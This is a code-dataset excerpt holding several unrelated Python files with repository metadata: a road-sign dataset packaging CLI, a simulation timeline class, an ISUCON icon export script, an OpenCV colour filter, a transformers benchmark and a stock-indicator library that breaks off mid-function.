title=\"Klassen\",\n loc=\"center left\",\n bbox_to_anchor=(1, 0, 0.5, 1),\n prop={'size': 44});\n\n plt.setp(autotexts, size=34, weight=\"bold\")\n plt.setp(legend.get_title(), fontsize=64)\n ax.text(0.3, 0.1, \"Total number of objects: %d\" % (np.sum(data)), fontsize=44, transform=plt.gcf().transFigure)\n ax.set_title(\"Klassenverteilung\", fontsize=64)\n fig.savefig(os.path.join(self.PATH, 'Class Distribution.png'))\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'Class Distribution.png'), 'Class Distribution.png',\n zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'Class Distribution.png'))\n print(\"Pie chart successfully created.\")\n\n def createDataSetZIP(self, name = None, sep = None, split = None):\n if not name:\n name = 'DataSet.zip'\n\n if split:\n t = int(len(self.label_paths) / 100 * split)\n train = range(t)\n random.shuffle(list(train))\n else:\n train = range(len(self.label_paths))\n\n\n with zipfile.ZipFile(os.path.join(self.PATH, name), 'w') as zip_file:\n\n for i in range(len(self.label_paths)):\n if split:\n if i in train:\n folder = 'Train/'\n else:\n folder = 'Test/'\n else:\n folder = ''\n\n label = self.label_paths[i]\n xml = label.split(os.path.sep)[-1]\n img = xml[:-3] + \"png\"\n\n for ob in ET.parse(label).getroot().iter('object'):\n c = int(ob.find('name').text)\n if c in self.classes:\n img_added = []\n zip_file.write(label, os.path.join(folder + 'Labels', xml), zipfile.ZIP_DEFLATED)\n\n for p, dirs, files in os.walk(self.PATH):\n if img in files:\n if img not in img_added:\n zip_file.write(os.path.join(p, img), os.path.join(folder + \"Images\", img),\n zipfile.ZIP_DEFLATED)\n img_added.append(img)\n else:\n break\n break\n\n if not sep:\n self.createPieChart(zip_file)\n self.createCSVOverview(zip_file)\n self.createCSVLabelMap(zip_file)\n\n def createCSVLabelMap(self, zipf=None):\n xml_list = []\n\n for label in self.label_paths:\n tree = ET.parse(label)\n root = tree.getroot()\n\n for member in root.findall('object'):\n clazz = int(member.find('name').text)\n\n if clazz in self.classes:\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n self._getClassName(int(member[0].text)),\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text)\n )\n xml_list.append(value)\n column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n xml_df.to_csv(os.path.join(self.PATH, 'train.csv'), index=None)\n\n if zipf:\n zipf.write(os.path.join(self.PATH, 'train.csv'), 'labels.csv', zipfile.ZIP_DEFLATED)\n os.remove(os.path.join(self.PATH, 'train.csv'))\n print(\"Label CSV successfully created.\")\n\n\nclass FullPaths(argparse.Action):\n \"\"\"Expand user- and relative-paths\"\"\"\n def __call__(self, parser, namespace, values, option_string=None):\n setattr(namespace, self.dest, os.path.abspath(os.path.expanduser(values)))\n\n\ndef is_dir(dirname):\n \"\"\"Checks if a path is an actual directory\"\"\"\n if not os.path.isdir(dirname):\n msg = \"{0} is not a directory\".format(dirname)\n raise argparse.ArgumentTypeError(msg)\n else:\n return dirname\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Generate Data Sets for Object detection!')\n parser.add_argument('-p', help=\"Pfad zum Ordner des Datasets.\", action=FullPaths, type=is_dir, metavar='PATH')\n\n parser.add_argument('-c', help=\"Bestimmte Klassen setzen.\", metavar='classes', type=int, nargs='*')\n parser.add_argument('--zip', help='Komplettes Datenset als zip erstellen.', dest='zip', action='store_true')\n parser.add_argument('--stat_csv', help='Klassen Statistik als csv erstellen.', dest='csv', action='store_true')\n parser.add_argument('--stat_img', help='Klassen Statistik als png erstellen.', dest='img', action='store_true')\n parser.add_argument('--del_img', help='Bilder ohne Label löschen.', dest='delete', action='store_true')\n parser.add_argument('--train_csv', help='Train.csv für Object Detection erstellen.', dest='train', action='store_true')\n parser.add_argument('--sep_class', help='ZIP für jeden Klasse einzelnd erstellen.', dest='sep', action='store_true')\n parser.add_argument('--split', help=\"Train/Test Split - % für Train\", dest='split', type=int)\n\n args = parser.parse_args(argv)\n\n if args.c:\n generator = Generator(args.p, args.c)\n else:\n generator = Generator(args.p)\n\n if args.delete:\n generator.deleteEmptyImages()\n\n if args.zip:\n if not args.sep:\n if args.split:\n generator.createDataSetZIP(split=args.split)\n else:\n generator.createDataSetZIP()\n else:\n if args.c:\n classes = args.c\n else:\n classes = range(1, 155)\n for c in classes:\n gen = Generator(args.p, [c])\n name = 'Class_' + str(c) + '.zip'\n if args.split:\n gen.createDataSetZIP(name=name, sep=True, split=args.split)\n print(name + \"- wurde erzeugt!\")\n else:\n gen.createDataSetZIP(name=name, sep=True)\n print(name + \"- wurde erzeugt!\")\n\n if args.csv:\n generator.createCSVOverview()\n\n if args.img:\n generator.createPieChart()\n\n if args.train:\n generator.createCSVLabelMap()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])", "repo_name": "Project-Road-Sign-Detection/Tensorflow-Street-Sign-Recognition", "sub_path": "Data Set Pipeline/DataSetCLI.py", "file_name": "DataSetCLI.py", "file_ext": "py", "file_size_in_byte": 20036, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.walk", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 182, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path", "line_number": 185, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 193, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 193, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 228, "usage_type": "call"}, {"api_name": "csv.QUOTE_NONE", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path", "line_number": 235, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 235, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 236, "usage_type": "call"}, {"api_name": "os.path", "line_number": 236, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 240, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 246, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 262, "usage_type": "call"}, {"api_name": "os.path", "line_number": 262, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 277, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 294, "usage_type": "name"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 295, "usage_type": "name"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 297, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 301, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 301, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 301, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 301, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path", "line_number": 306, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 307, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree.parse", "line_number": 322, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 322, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 341, "usage_type": "call"}, {"api_name": "os.path", "line_number": 341, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 344, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path", "line_number": 345, "usage_type": "attribute"}, {"api_name": "argparse.Action", "line_number": 349, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 359, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 365, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 419, "usage_type": "attribute"}]} +{"seq_id": "26972475259", "text": "from sortedcontainers import SortedSet\nfrom request import Request\nfrom response import Response\n\n\nclass Timeline:\n def __init__(self, requests_file_name):\n self.timeline = SortedSet(key=lambda x: x.finish_time if type(x) is Response else x.created_time)\n with open(requests_file_name) as requests_input_file:\n for line in requests_input_file:\n tokens = line.split()\n time, app_name = int(tokens[0]), tokens[1]\n self.add(Request(app_name, time))\n\n def get_next(self):\n return self.timeline.pop(0) if len(self.timeline) else None\n\n def add(self, obj):\n self.timeline.add(obj)\n\n def iterate(self):\n while True:\n next_elem = self.get_next()\n if next_elem:\n yield next_elem\n else:\n break\n", "repo_name": "maxxaon/kursovaya", "sub_path": "scaler_Marin/timeline.py", "file_name": "timeline.py", "file_ext": "py", "file_size_in_byte": 850, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sortedcontainers.SortedSet", "line_number": 8, "usage_type": "call"}, {"api_name": "response.Response", "line_number": 8, "usage_type": "name"}, {"api_name": "request.Request", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "19189003342", "text": "from dc import *\nfrom sqlalchemy.pool import QueuePool\nimport mysql.connector\nimport os\n\nmysql_connection_env = {\n \"host\": getenv(\"MYSQL_HOST\", \"127.0.0.1\"),\n \"port\": getenv(\"MYSQL_PORT\", 3306),\n \"user\": getenv(\"MYSQL_USER\", \"isucon\"),\n \"password\": getenv(\"MYSQL_PASS\", \"isucon\"),\n \"database\": getenv(\"MYSQL_DBNAME\", \"isucondition\"),\n \"time_zone\": \"+09:00\",\n}\ndef select_all(cnxpool, query, *args, dictionary=True):\n cnx = cnxpool.connect()\n try:\n cur = cnx.cursor(dictionary=dictionary)\n cur.execute(query, *args)\n return cur.fetchall()\n finally:\n cnx.close()\n\n\n# コネクションプール サイズ10\ncnxpool = QueuePool(lambda: mysql.connector.connect(**mysql_connection_env), pool_size=10)\n\nquery = \"\"\"\n SELECT * FROM `isu` ORDER BY `id` DESC\n\"\"\"\nisu_list = [Isu(**row) for row in select_all(cnxpool, query, ())]\n\nfor isu in isu_list:\n image = isu.image\n filepath = APP_ROUTE + f\"api/isu/{isu.jia_isu_uuid}/icon\"\n os.makedirs(os.path.dirname(filepath), exist_ok=True)\n with open(filepath, \"wb\") as f:\n f.write(image)\n", "repo_name": "lapras-inc/ISUCON-11-manin", "sub_path": "python/_export_icon.py", "file_name": "_export_icon.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.pool.QueuePool", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 25, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 25, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 25, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}]} +{"seq_id": "74285446247", "text": "import cv2 \nimport numpy as np \n\nminRed1 = np.array([90, 100, 100]) \nmaxRed1 = np.array([135, 255, 255]) \n\nminRed2 = np.array([0, 100, 250])\nmaxRed2 = np.array([0, 255, 255])\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n ret, frame = cap.read() \n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV) \n\n red_only1 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed1, maxRed1)) \n red_only2 = cv2.bitwise_and(frame, frame, mask=cv2.inRange(hsv, minRed2, maxRed2)) \n\n result = cv2.addWeighted(red_only1, 1, red_only2, 1, 1)\n cv2.imshow('window', frame) \n cv2.imshow('window2', result) \n\n if cv2.waitKey(1) & 0xFF == ord('q'): \n break \n\ncap.release() \ncv2.destroyAllWindows()\n\n", "repo_name": "Null-Delta/ADMP", "sub_path": "LR2/task2.py", "file_name": "task2.py", "file_ext": "py", "file_size_in_byte": 701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.bitwise_and", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "21583851226", "text": "import torch\nfrom transformers import AutoTokenizer, AutoModelForTokenClassification, pipeline, AutoModelForCausalLM\nfrom transformers import pipeline\nfrom deepspeed.module_inject import HFBertLayerPolicy\nimport deepspeed\nimport tqdm\nfrom datasets import load_dataset\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\ndataset = load_dataset(\"ChaiML/user_model_inputs\")\n# Model Repository on huggingface.co\nmodel_id = \"KoboldAI/OPT-6B-nerys-v2\"\n# model_id = \"gpt2\"\n\nstats = {}\n\n# load model and tokenizer\ntry:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=True)\nexcept:\n tokenizer = AutoTokenizer.from_pretrained(model_id, use_fast=False)\n\n# Test pipeline\nGENERATION_KWARGS = {\n \"max_new_tokens\": 32,\n # \"min_new_tokens\": 8,\n 'eos_token_id': 198,\n 'do_sample': True,\n 'pad_token_id': 198,\n 'temperature': 0.72,\n 'top_k': 0,\n 'top_p': 0.725,\n 'repetition_penalty': 1.13,\n}\n\nINPUT_EXAMPLES = dataset[\"train\"][\"text\"][:100]\n\nexample = INPUT_EXAMPLES[0]\n\nimport os\nfrom optimum.onnxruntime import ORTModelForCausalLM\nfrom transformers import AutoTokenizer, pipeline\n\nmodel_checkpoint = \"KoboldAI/OPT-6B-nerys-v2\"\nsave_directory = \"onnx/\"\nfile_name = \"model.onnx\"\nonnx_path = os.path.join(save_directory, \"model.onnx\")\n\n# Load a model from transformers and export it through the ONNX format\n# model = ORTModelForCausalLM.from_pretrained(model_checkpoint, from_transformers=True).to(0)\n\nmax_batch_size = 1\nfor i in range(1, 5):\n try:\n inputs = tokenizer([example] * i, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n print(f\"Batch size: {i}\")\n max_batch_size = i\n except Exception as ex:\n print(ex)\n break\n\n# torch_pipe = pipeline(\"text-generation\", model=model, tokenizer=tokenizer, device=0)\nprint(\"ONNX single batch\")\ntorch_outputs = []\nfor example in tqdm.tqdm(INPUT_EXAMPLES[:20], desc=\"ONNX single batch\"):\n inputs = tokenizer(example, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\n # torch_output = torch_pipe(example, **GENERATION_KWARGS)[0][\"generated_text\"][len(example):]\n # torch_outputs.append(torch_output)\nprint(\"ONNX batch size\")\ntorch_outputs = []\ntry:\n for example in tqdm.tqdm(INPUT_EXAMPLES[:10], desc=\"ONNX batch size\"):\n inputs = tokenizer([example] * max_batch_size, return_tensors='pt').to(0)\n # result = model.generate(**inputs, **GENERATION_KWARGS)\nexcept Exception as ex:\n print(ex)\n", "repo_name": "AlekseyKorshuk/xla-clm", "sub_path": "onnx/bert.py", "file_name": "bert.py", "file_ext": "py", "file_size_in_byte": 2510, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "warnings.filterwarnings", "line_number": 10, "usage_type": "call"}, {"api_name": "datasets.load_dataset", "line_number": 11, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 20, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 22, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tqdm.tqdm", "line_number": 67, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "24315675344", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# https://www.quantopian.com/posts/technical-analysis-indicators-without-talib-code\n# https://github.com/FreddieWitherden/ta/blob/master/ta.py\n\nimport pandas as pd\nimport numpy as np\n\n#Moving Average\ndef MA(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n), name = 'MA_' + str(n))\n return MA\n\n#Exponential Moving Average\ndef EMA(df, n):\n EMA = pd.Series(df['close'].ewm(span = n, min_periods = int(n - 1)).mean(), name = 'EMA_' + str(n))\n return EMA\n\n#Momentum\ndef MOM(df, n):\n M = pd.Series(df['close'].diff(n), name = 'Momentum_' + str(n))\n return M\n\n#Rate of Change\ndef ROC(df, n):\n M = df['close'].diff(n - 1)\n N = df['close'].shift(n - 1)\n ROC = pd.Series(M / N, name = 'ROC_' + str(n))\n return ROC\n\n#Average True Range\ndef ATR(df, n):\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean(), name = 'ATR_' + str(n))\n return ATR\n\n#Bollinger Bands\ndef BBANDS(df, n):\n MA = pd.Series(pd.rolling_mean(df['close'], n))\n MSD = pd.Series(pd.rolling_std(df['close'], n))\n b1 = 4 * MSD / MA\n B1 = pd.Series(b1, name = 'BollingerB_' + str(n))\n b2 = (df['close'] - MA + 2 * MSD) / (4 * MSD)\n B2 = pd.Series(b2, name = 'Bollinger%b_' + str(n))\n return B1, B2\n\n#Pivot Points, Supports and Resistances\ndef PPSR(df):\n PP = pd.Series((df['high'] + df['low'] + df['close']) / 3)\n R1 = pd.Series(2 * PP - df['low'])\n S1 = pd.Series(2 * PP - df['high'])\n R2 = pd.Series(PP + df['high'] - df['low'])\n S2 = pd.Series(PP - df['high'] + df['low'])\n R3 = pd.Series(df['high'] + 2 * (PP - df['low']))\n S3 = pd.Series(df['low'] - 2 * (df['high'] - PP))\n psr = {'PP':PP, 'R1':R1, 'S1':S1, 'R2':R2, 'S2':S2, 'R3':R3, 'S3':S3}\n PSR = pd.DataFrame(psr)\n return PSR\n\n#Stochastic oscillator %K\ndef STOK(df):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n return SOk\n\n#Stochastic oscillator %D\ndef STO(df, n):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n SOd = pd.Series(SOk.ewm(span = n, min_periods = int(n - 1)).mean(), name = 'SO%d_' + str(n))\n return SOd\n\n#Trix\ndef TRIX(df, n):\n EX1 = df['close'].ewm(span = n, min_periods = int(n - 1)).mean()\n EX2 = EX1.ewm(span = n, min_periods = int(n - 1)).mean()\n EX3 = EX2.ewm(span = n, min_periods = int(n - 1)).mean()\n i = 0\n ROC_l = [0]\n while i + 1 <= df.index[-1]:\n ROC = (EX3[i + 1] - EX3[i]) / EX3[i]\n ROC_l.append(ROC)\n i = i + 1\n Trix = pd.Series(ROC_l, name = 'Trix_' + str(n))\n return Trix\n\n#Average Directional Movement Index\ndef ADX(df, n, n_ADX):\n i = 0\n UpI = []\n DoI = []\n while i + 1 <= df.index[-1]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean())\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n ADX = pd.Series((abs(PosDI - NegDI) / (PosDI + NegDI)).ewm(span = n_ADX, min_periods = int(n_ADX - 1)).mean(), name = 'ADX_' + str(n) + '_' + str(n_ADX))\n return ADX\n\n#DEMA\ndef DEMA(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n DEMA = pd.Series(100 * (EMAfast- EMAslow) / ((EMAfast + EMAslow) / 2), name = 'DEMA_' + str(n_fast) + '_' + str(n_slow))\n return DEMA\n\n#MACD, MACD Signal and MACD difference\ndef MACD(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n MACD = pd.Series(EMAfast - EMAslow, name = 'MACD_' + str(n_fast) + '_' + str(n_slow))\n MACDsign = pd.Series(MACD.ewm(span = signal, min_periods = int(signal)).mean(), name = 'MACDsign_' + str(n_fast) + '_' + str(n_slow))\n MACDdiff = pd.Series(MACD - MACDsign, name = 'MACDdiff_' + str(n_fast) + '_' + str(n_slow))\n return MACD, MACDsign, MACDdiff\n\n#PPO, PPO Signal and PPO difference\ndef PPO(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n PPO = pd.Series(100 * (EMAfast - EMAslow) / EMAslow, name = 'PPO_' + str(n_fast) + '_' + str(n_slow))\n PPOsign = pd.Series(PPO.ewm(span = signal, min_periods = int(signal)).mean(), name = 'PPOsign_' + str(n_fast) + '_' + str(n_slow))\n PPOdiff = pd.Series(PPO - PPOsign, name = 'PPOdiff_' + str(n_fast) + '_' + str(n_slow))\n return PPO, PPOsign, PPOdiff\n\n#Mass Index\ndef MassI(df):\n Range = df['high'] - df['low']\n EX1 = Range.ewm(span = 9, min_periods = 8).mean()\n EX2 = EX1.ewm(span = 9, min_periods = 8).mean()\n Mass = EX1 / EX2\n MassI = pd.Series(pd.rolling_sum(Mass, 25), name = 'Mass Index')\n return MassI\n\n#Vortex Indicator: http://www.vortexindicator.com/VFX_VORTEX.PDF\ndef Vortex(df, n):\n i = 0\n TR = [0]\n while i < df.index[-1]:\n Range = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR.append(Range)\n i = i + 1\n i = 0\n VM = [0]\n while i < df.index[-1]:\n Range = abs(df.ix[i + 1, 'high'] - df.ix[i, 'low']) - abs(df.ix[i + 1, 'low'] - df.ix[i, 'high'])\n VM.append(Range)\n i = i + 1\n VI = pd.Series(pd.rolling_sum(pd.Series(VM), n) / pd.rolling_sum(pd.Series(TR), n), name = 'Vortex_' + str(n))\n return VI\n\n\n\n\n\n#KST Oscillator\ndef KST(df, r1, r2, r3, r4, n1, n2, n3, n4):\n M = df['close'].diff(r1 - 1)\n N = df['close'].shift(r1 - 1)\n ROC1 = M / N\n M = df['close'].diff(r2 - 1)\n N = df['close'].shift(r2 - 1)\n ROC2 = M / N\n M = df['close'].diff(r3 - 1)\n N = df['close'].shift(r3 - 1)\n ROC3 = M / N\n M = df['close'].diff(r4 - 1)\n N = df['close'].shift(r4 - 1)\n ROC4 = M / N\n KST = pd.Series(pd.rolling_sum(ROC1, n1) + pd.rolling_sum(ROC2, n2) * 2 + pd.rolling_sum(ROC3, n3) * 3 + pd.rolling_sum(ROC4, n4) * 4, name = 'KST_' + str(r1) + '_' + str(r2) + '_' + str(r3) + '_' + str(r4) + '_' + str(n1) + '_' + str(n2) + '_' + str(n3) + '_' + str(n4))\n return KST\n\n#Relative Strength Index\ndef RSI(df, n):\n UpMove = df['high'].diff(-1)\n DoMove = df['low'].diff(1)\n UpMove[UpMove <= DoMove] = 0\n DoMove[DoMove <= UpMove] = 0\n UpMove[UpMove < 0] = 0\n DoMove[DoMove < 0] = 0\n UpMove = pd.Series(UpMove)\n DoMove = pd.Series(DoMove)\n PosDI = pd.Series(UpMove.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoMove.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef RSI_(df, n):\n i = 0\n UpI = [0]\n DoI = [0]\n while i + 1 < df.shape[0]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef _RSI(df, n):\n nint = int(n)\n deltas = df[\"close\"].diff()\n seed = deltas[:nint+1]\n up = seed[seed>=0].sum()/n\n down = -seed[seed<0].sum()/n\n rs = up/down\n rsi = np.zeros((df.shape[0],), dtype=np.float64)\n rsi[:nint] = 100. - 100./(1.+rs)\n\n for i in range(nint, len(deltas)):\n delta = deltas[i-1] # cause the diff is 1 shorter\n\n if delta>0:\n upval = delta\n downval = 0.\n else:\n upval = 0.\n downval = -delta\n\n up = (up*(n-1) + upval)/n\n down = (down*(n-1) + downval)/n\n\n rs = up/down\n rsi[i] = 100. - 